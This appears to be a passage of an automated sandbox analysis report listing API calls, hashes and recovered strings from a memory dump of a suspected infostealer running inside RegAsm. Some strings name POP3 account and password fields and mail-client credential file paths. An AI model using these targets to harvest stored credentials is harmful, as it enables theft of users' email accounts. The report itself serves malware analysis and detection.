                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .
                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                                                                • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                • API String ID: 4218353326-3023110444
                                                                                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                APIs
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                 • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
